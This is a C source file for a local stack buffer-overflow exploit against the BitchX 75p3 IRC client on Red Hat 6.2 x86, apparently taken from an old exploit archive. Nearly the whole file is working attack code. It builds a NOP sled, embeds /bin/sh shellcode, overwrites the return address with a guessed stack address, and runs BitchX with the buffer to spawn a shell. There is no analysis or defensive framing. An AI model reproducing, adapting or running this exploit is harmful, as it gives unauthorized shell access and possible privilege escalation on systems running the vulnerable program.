BitchX-75p3 local exploit, Redhat 6.2 x86.
0fbfba9f5b11b246a994aa20de5302b946a018356a05381421a68087073333ca
/****************************************************************************/
/* BitchX-75p3 exploit, Redhat 6.2 x86, by flea <flea@netc.pt> */
/* */
/* Yet another example of bad coding. */
/****************************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x90
#define DEFAULT_ADDR 0xbffffc6c
#define BSIZE 2060
unsigned long get_sp() {
__asm__("movl %esp, %eax");
}
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
main ( int argc, char *argv[]) {
char buffer[BSIZE];
long address;
if (argc == 1) {
printf("BitchX-75p3 exploit, Redhat 6.2 x86, by flea\n");
printf("usage: %s <offset>\n", argv[0]);
printf("offset = 0, address=0x%x\n",DEFAULT_ADDR);
exit(0);
}
if ( strcmp(argv[1], "0") == 0)
address = DEFAULT_ADDR;
else
address = get_sp() - atoi(argv[1]);
/* builds our buffer */
printf("Using address = 0x%x\n", address);
memset(buffer, NOP, BSIZE);
memcpy(buffer+(BSIZE-4-strlen(shellcode)), shellcode, strlen(shellcode));
*(long *) &buffer[BSIZE-4] = address;
execl("/usr/local/bin/BitchX","BitchX" ,"-c", buffer, 0);
}
/* www.hack.co.za [21 July]*/